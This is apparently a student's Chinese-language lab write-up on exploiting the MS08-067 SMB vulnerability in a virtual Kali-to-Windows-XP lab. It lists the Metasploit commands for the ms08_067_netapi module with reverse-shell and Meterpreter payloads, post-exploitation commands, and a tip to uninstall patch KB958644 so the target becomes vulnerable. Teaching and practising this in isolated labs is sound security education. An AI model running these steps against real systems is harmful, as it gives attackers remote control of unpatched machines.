MS08_067漏洞滲透攻擊實踐

MS08_067漏洞滲透攻擊實踐

實驗前準備

一、兩臺虛擬機,其中一臺爲kali,一臺爲windows xp sp3(英文版)。shell

二、在VMware中設置兩臺虛擬機網絡爲NAT模式,自動分配IP地址,以後兩臺虛擬機就能夠直接ping通。以下圖:windows

若是ping不通,通常是ip地址不在同一個網段上,須要從新設置xp的ip地址,打開:控制面板->網絡鏈接->右擊本地鏈接選擇屬性->選擇internet協議(TCP/IP)->屬性,就能夠編輯ip地址了。例如:kali ip是192.168.241.131,xp ip設置爲:192.168.241.130。前三位同樣,最後一位隨便設置。api

MS08_067遠程漏洞攻擊實踐:Shell

一、在kali終端中開啓msfconsole。安全

二、輸入命令search ms08_067,會顯示出找到的滲透模塊,以下圖所示:網絡

三、輸入命令use exploit/windows/smb/ms08_067_netapi,進入該漏洞模塊的使用。session

四、輸入命令show payload會顯示出有效的攻擊載荷,以下圖所示,咱們找到一個shell_reverse_tcp。tcp

五、命令show targets會顯示出能夠被攻擊的靶機的操做系統型號,以下圖所示:操作系統

六、使用命令set payload generic/shell_reverse_tcp設置攻擊有效載荷。3d

七、輸入命令show options顯示咱們須要在攻擊前須要設置的數據,以下圖紅框圈住的部分。code

八、輸入命令

set LHOST "kali Ip" 

set RHOST "Win xp Ip"

並使用命令show options再次查看payload狀態。

九、輸入命令exploit開始攻擊,以下圖所示是正常攻擊成功結果。

在kali上執行ipconfig/all獲得以下圖所示:

在win xp上執行一樣的命令,以下圖所示:

MS08_067遠程漏洞攻擊實踐:meterpreter

一、前面依然使用命令use exploit/windows/smb/ms08_067_netapi,進入ms08_067漏洞模塊。

二、設置payload:set payload windows/meterpreter/reverse_tcp

三、show options,查看須要設置的ip地址,以下圖所示,是已經設置好的

四、成功攻擊結果:

五、執行ifconfig,查看靶機地址:

六、ps查看進程:

七、meterpreter轉shell:

實驗中遇到的問題

一、在作實驗的時候用老師的xp系統做爲靶機,可是在exploit的時候顯示以下:no session was created。

二、手動設置一個set session 1,結果仍是不成功。

三、在exploit前,使用check查看靶機狀態,返回如下信息,代表目標主機是安全的,不能被攻擊。

四、網上查到能夠卸載ms08_067的補丁,即卸載KB958644,文件路徑:c:/windows找到KB958644(這是個隱藏文件),打開卸載exe程序,以下:

五、重啓後,仍是不能成功,最後找了一個英文版的win xp sp 3 ,才成功完成。

相關文章
相關標籤/搜索